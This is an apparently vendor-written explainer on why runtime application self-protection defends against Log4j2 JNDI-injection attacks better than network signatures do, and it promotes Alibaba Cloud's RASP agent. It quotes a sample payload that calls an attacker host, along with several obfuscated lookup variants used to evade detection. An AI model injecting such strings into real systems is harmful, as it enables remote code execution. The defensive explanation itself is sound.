Why RASP Outperforms Traffic‑Based Defenses Against Log4j2 Exploits

Log4j2 Vulnerability Characteristics

The Apache Log4j2 remote‑code‑execution (RCE) flaw enables arbitrary code execution through JNDI injection. Because Log4j is a core logging library, virtually every Java application includes it, making the attack surface extremely large.

Two technical traits make detection difficult:

Arbitrary remote code execution – an attacker can supply a malicious JNDI lookup (e.g., ${jndi:ldap://attacker.com/a}) that causes the vulnerable JVM to download and execute arbitrary classes.

Obfuscated traffic patterns – attackers split payload strings using Log4j’s lookup functions such as ${lower:j}Ndi, ${upper:JN}di, or nested expressions ( ${aaa:vv:cc:-j}ndi). This breaks the payload into non‑contiguous fragments, preventing reliable signature‑based network detection.

Runtime Application Self‑Protection (RASP)

RASP instruments a running application by hooking critical APIs (e.g., JNDI, process execution, file I/O, network calls). It monitors the application’s behavior in real time and blocks operations that match high‑risk patterns such as command execution, file upload, or Server‑Side Request Forgery (SSRF).

Why RASP defeats 0‑day attacks

True‑positive focus – RASP only blocks actions that have already been invoked by the vulnerable component, eliminating many false alarms that stem from speculative payload detection.

Low false‑positive rate – If an application does not use Log4j2, payload‑based alerts are ignored because the risky API is never reached.

Component self‑discovery – RASP can automatically locate the exact JAR or class path of the vulnerable Log4j2 instance and correlate it with known CVE identifiers (e.g., CVE‑2021‑44228), enabling rapid remediation.

Cloud‑Native RASP Architecture

Alibaba Cloud’s RASP is built as a lightweight, cloud‑native agent that can be attached to a Java process with a single click through the ARMS console. The design emphasizes minimal performance overhead, automatic scaling, and compatibility with containerized or VM‑based deployments.

In production deployments during the Log4j2 incident, the cloud‑native RASP intercepted 184 real attacks across eight Java applications within two days, including:

43 command‑execution attempts

141 DNS‑based reconnaissance probes

These attacks would likely have succeeded without the in‑process protection.

Additional Benefits of RASP

Automatic third‑party component discovery – When a new 0‑day emerges, RASP instantly reports the vulnerable component’s file system path, as illustrated by the screenshot of Log4j2 location detection.

CVE enrichment – Detected components are automatically matched to their CVE IDs, severity scores, and remediation guidance.

Rule‑free protection – Because RASP evaluates application behavior rather than network signatures, it remains effective against encrypted traffic, memory‑resident malware, or any future obfuscation technique that changes payload appearance.